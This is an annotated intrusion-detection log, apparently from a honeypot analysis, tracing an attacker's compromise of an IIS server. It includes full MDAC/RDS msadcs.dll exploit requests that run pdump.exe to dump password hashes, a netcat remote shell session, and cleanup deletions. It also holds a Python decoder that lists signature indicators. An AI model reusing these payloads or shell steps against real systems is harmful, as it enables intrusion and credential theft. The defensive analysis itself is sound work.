=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.244260 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:31097 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CBE3DA5 Ack: 0x9DDB11DB Win: 0x1F51 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session ends '221 Buh bye, you secksi hax0r j00 :]'
[**] FTP control channel [**]
02/04-05:42:55.628742 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12010 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x9DDB11DB Ack: 0x2CBE3DAB Win: 0x2197 TcpLen: 20
221 Buh bye, you secksi hax0r j00 :]..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:55.648760 172.16.1.106:80 -> 213.116.251.162:1885
TCP TTL:127 TOS:0x0 ID:31609 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE39CF Ack: 0x9DD68BCF Win: 0x20F8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:51 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.075053 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34169 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA535 Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.655576 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34425 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEA5FD Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC (RDS) vulnerability to execute pdump and append its output to the file 'yay.txt'. The POST to
!@# msadcs.dll/AdvancedDataFactory.Query carries a UTF-16 query (Snort prints the null bytes as dots) whose
!@# |shell("...")| expression the Jet engine evaluates as VBA; the '!ADM!ROX!YOUR!WORLD!' boundary is the hard-coded
!@# one from rfp's msadc.pl. This will give him/her the password hashes for a cracking tool later.
!@# NOTE: Commands run using the MDAC vulnerability execute with SYSTEM privileges (the IIS process itself), which is
!@# what dumping the SAM requires.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:43:52.580779 213.116.251.162:1891 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12037 IpLen:20 DgmLen:831 DF
***AP*** Seq: 0x9F3A4F1C Ack: 0x2CBF9EC4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 637..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 428..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>.y.a.y...t.x.t.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
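Added example (not the page's own code): decoding the RDS request above. The RDS body is UTF-16LE and Snort prints each null byte as a dot, so the query text comes back by taking every other character. The script then pulls out the command inside the Jet |shell("...")| expression and the ODBC connection string, and lists the request features a signature for this attack can key on. The sample strings are transcribed from the packet above with the line wrapping removed; the header block is reconstructed with CRLFs (both constructed).

```python
"""Decode the RDS/MDAC exploit POST from the capture and pull out the
injected shell() expression.  Added example, not part of the original log."""
import re

# The query argument exactly as Snort printed it, with the 64-column wrapping
# removed (constructed from the capture above).  The RDS body is UTF-16LE;
# Snort prints each character's zero byte as '.', so the text arrives
# interleaved with dots.
RENDERED_QUERY = (
    r"S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|."
    r's.h.e.l.l.(.".c.m.d. ./.c. .C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .'
    r'F.i.l.e.s.\.s.y.s.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>.y.a.y...t.x.t.".).|'
    r".'."
)
RENDERED_DSN = (
    r"d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;."
    r"d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;."
)
# Request line and headers from the same packet (constructed, CRLFs restored).
REQUEST_HEAD = (
    "POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1\r\n"
    "User-Agent: ACTIVEDATA\r\nHost: lab.wiretrip.net\r\nContent-Length: 637\r\n"
    "Connection: Keep-Alive\r\n\r\nADCClientVersion:01.06\r\n"
    "Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3\r\n"
)

SHELL_CALL = re.compile(r'\|shell\("(.*?)"\)\|')
# Sample database that ships with the IIS documentation; the exploit relies on
# its well-known path so that the Jet driver can be reached with a valid DSN.
KNOWN_SAMPLE_MDB = r"c:\winnt\help\iis\htm\tutorial\btcustmr.mdb"


def undot_utf16(rendered: str) -> str:
    """Recover text from Snort's printable rendering of UTF-16LE ASCII text:
    every character is followed by one '.' standing in for its high byte, so
    the text is the even-indexed characters.  Raises if the shape is wrong
    (a real '.' in the text still sits at an even index, so the check holds)."""
    if len(rendered) % 2 or any(rendered[i] != "." for i in range(1, len(rendered), 2)):
        raise ValueError("not a dot-interleaved UTF-16LE rendering")
    return rendered[0::2]


def parse_rds_query(rendered_query: str, rendered_dsn: str) -> dict:
    """Return the SQL text, the command inside the Jet |shell("...")| VBA
    expression, and the ODBC connection-string parameters."""
    query = undot_utf16(rendered_query)
    dsn = undot_utf16(rendered_dsn)
    params = dict(kv.split("=", 1) for kv in dsn.rstrip(";").split(";") if "=" in kv)
    m = SHELL_CALL.search(query)
    return {
        "query": query,
        "shell_command": m.group(1) if m else None,
        "driver": params.get("driver"),
        "dbq": params.get("dbq"),
    }


def rds_indicators(request_head: str, query: str, dbq) -> list:
    """Features that mark this as the msadcs.dll attack rather than ordinary
    Remote Data Service traffic; each one is visible in the capture above."""
    found = []
    if "/msadc/msadcs.dll/AdvancedDataFactory.Query" in request_head:
        found.append("advanceddatafactory_query")
    if "User-Agent: ACTIVEDATA" in request_head:
        found.append("activedata_user_agent")
    if "!ADM!ROX!YOUR!WORLD!" in request_head:
        found.append("msadc_pl_boundary")
    if "|shell(" in query.lower():
        found.append("jet_vba_shell")
    if dbq and dbq.lower() == KNOWN_SAMPLE_MDB:
        found.append("known_sample_mdb")
    return found


if __name__ == "__main__":
    parsed = parse_rds_query(RENDERED_QUERY, RENDERED_DSN)
    print("query        :", parsed["query"])
    print("shell command:", parsed["shell_command"])
    print("dbq          :", parsed["dbq"])
    print("indicators   :", rds_indicators(REQUEST_HEAD, parsed["query"], parsed["dbq"]))
```

The security-relevant point the decoded query makes plain: the RDS DataFactory simply forwards attacker-supplied SQL and connection string to the Jet ODBC driver, and Jet evaluates the |...| expression as VBA, so the 'Customers' table and the WHERE clause are decoration; only the shell() call matters. The relative 'yay.txt' in the first run is why the file turns up in C:\ rather than the msadc directory.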
!@# Uses remote shell to get a dir listing but yay.txt is not there: the shell spawned via MDAC did not have the msadc
!@# directory as its working directory, so the relative 'yay.txt' landed elsewhere (it shows up in C:\ further down).
[**] netcat session 6969 [**]
02/04-05:43:56.131774 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38009 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA994 Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:56.681806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38265 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAA5C Ack: 0x9E43FB23 Win: 0x222E TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# '.[A' is ESC [ A, the up-arrow key: the intruder is driving netcat from a Unix terminal and tried to recall the
!@# previous command, but cmd.exe has no line editing over a socket and sees '<ESC>[Adir' as an unknown command.
[**] netcat session 6969 [**]
02/04-05:44:03.242174 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39289 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEADF3 Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
.[Adir..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\Program
Files\Common Files\system\msadc>..C:\Program Files\Common Files\
system\ms
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:03.806627 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39545 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEAEBC Ack: 0x9E43FB2B Win: 0x2226 TcpLen: 20
adc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:05.245136 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40057 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEAEC0 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries dir again, yay.txt still not there.
[**] netcat session 6969 [**]
02/04-05:44:05.810066 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40313 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEAF88 Ack: 0x9E43FB30 Win: 0x2221 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Deletes the FTP script 'ftpcom' using the remote shell. Cleanup.
[**] netcat session 6969 [**]
02/04-05:44:10.752997 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:41593 IpLen:20 DgmLen:142 DF
***AP*** Seq: 0x2CBEB31F Ack: 0x9E43FB3C Win: 0x2215 TcpLen: 20
del ftpcom....C:\Program Files\Common Files\system\msadc>..C:\Pr
ogram Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run 'ls' from the remote shell. Sorry, this is NT.
[**] netcat session 6969 [**]
02/04-05:44:13.557283 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42617 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBEB385 Ack: 0x9E43FB43 Win: 0x220E TcpLen: 20
ls...The name specified is not recognized as an..internal or ext
ernal command, operable program or batch file.....C:\Program Fil
es\Common Files\system\msadc>..C:\Program Files\Common Files\sys
tem\msadc
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:13.908806 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42873 IpLen:20 DgmLen:41 DF
***AP*** Seq: 0x2CBEB44E Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs dir from remote shell. ftpcom is gone.
[**] netcat session 6969 [**]
02/04-05:44:14.406569 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43129 IpLen:20 DgmLen:1112 DF
***AP*** Seq: 0x2CBEB44F Ack: 0x9E43FB46 Win: 0x220B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:43a ...02/04/01 06:
43a ....09/25/97 07:41a
596 adcjavas.inc..09/25/97 07:41a 589 adcvbs
.inc..04/30/97 11:00p 208,144 cmd1.exe..09/25/97
08:28a 172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23
,312 msadcf.dll..09/25/97 08:24a 91,408 msadco.d
ll..09/25/97 08:19a 5,120 msadcor.dll..09/26/97
08:19a 42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768
pdump.exe..10/02/97 07:28a 19,388 readme.txt..0
2/04/01 06:41a 36,864 samdump.dll..
15 File(s) 698,285 bytes.. 1,69
0,861,056 bytes free....C:\Program Files\Common Files\system\msa
dc>..C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to read the 'readme.txt' file using the 'type' command from the remote shell. Mistypes the filename and doesn't try again.
[**] netcat session 6969 [**]
02/04-05:44:20.267054 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45689 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBEB87F Ack: 0x9E43FB55 Win: 0x21FC TcpLen: 20
type readme.e..The system cannot find the file specified.....C:\
Program Files\Common Files\system\msadc>..C:\Program Files\Commo
n Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to run pdump again, this time redirecting output to the absolute path 'c:\yay.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:44:36.999012 213.116.251.162:1893 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12085 IpLen:20 DgmLen:839 DF
***AP*** Seq: 0x9FE5422E Ack: 0x2CC04C74 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 645..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 436..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x
.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:42.700098 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49529 IpLen:20 DgmLen:203 DF
***AP*** Seq: 0x2CBEB914 Ack: 0x9E43FB5A Win: 0x21F7 TcpLen: 20
c:...The filename, directory name, or volume label syntax is inc
orrect.....C:\Program Files\Common Files\system\msadc>..C:\Progr
am Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:43.701287 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50297 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CBEB9B7 Ack: 0x9E43FB5F Win: 0x21F2 TcpLen: 20
cd\....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:44.602862 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50809 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEB9C8 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# From remote shell: CDs to 'c:\' and lists files. There is yay.txt, but it is 0 bytes: pdump wrote nothing to stdout
!@# in either run (anything it wrote to stderr is not caught by the '>>' redirect), so the file holds no hashes.
[**] netcat session 6969 [**]
02/04-05:44:45.158335 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51065 IpLen:20 DgmLen:746 DF
***AP*** Seq: 0x2CBEBA90 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:26a
7 fun..12/07/00 03:30p InetPub..
12/07/00 03:12p Multimedia Files..12/26/0
0 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p
Program Files..12/21/00 08:59p TE
MP..02/04/01 06:42a WINNT..12/26/00 07:0
9p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,529 bytes
.. 1,690,861,056 bytes free....C:\>..C:
\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries another *nix command from the remote shell: 'rm' instead of 'del'.
[**] netcat session 6969 [**]
02/04-05:44:51.365858 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52601 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBEBD52 Ack: 0x9E43FB6B Win: 0x21E6 TcpLen: 20
rm ....The name specified is not recognized as an..internal or e
xternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# More cleanup: deletes the file 'fun' using the remote shell.
[**] netcat session 6969 [**]
02/04-05:44:54.366817 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53881 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x2CBEBDD0 Ack: 0x9E43FB74 Win: 0x21DD TcpLen: 20
del fun....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.271762 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54393 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEBDE5 Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.756325 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54649 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEBEAD Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:00.325593 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56185 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x2CBEC143 Ack: 0x9E43FB87 Win: 0x21CA TcpLen: 20
cd exploites..The system cannot find the path specified.....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.227368 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56697 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC189 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.783290 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56953 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEC251 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Exploring... After a 'cd exploites' typo and another dir, uses the remote shell to 'cd' into the exploits directory and walk its subdirectories.
[**] netcat session 6969 [**]
02/04-05:45:03.630418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57977 IpLen:20 DgmLen:81 DF
***AP*** Seq: 0x2CBEC4E7 Ack: 0x9E43FB99 Win: 0x21B8 TcpLen: 20
cd exploits....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.385185 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:58489 IpLen:20 DgmLen:146 DF
***AP*** Seq: 0x2CBEC510 Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.884912 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59001 IpLen:20 DgmLen:396 DF
***AP*** Seq: 0x2CBEC57A Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
12/26/00 07:36p ...12/26/00 07:36p
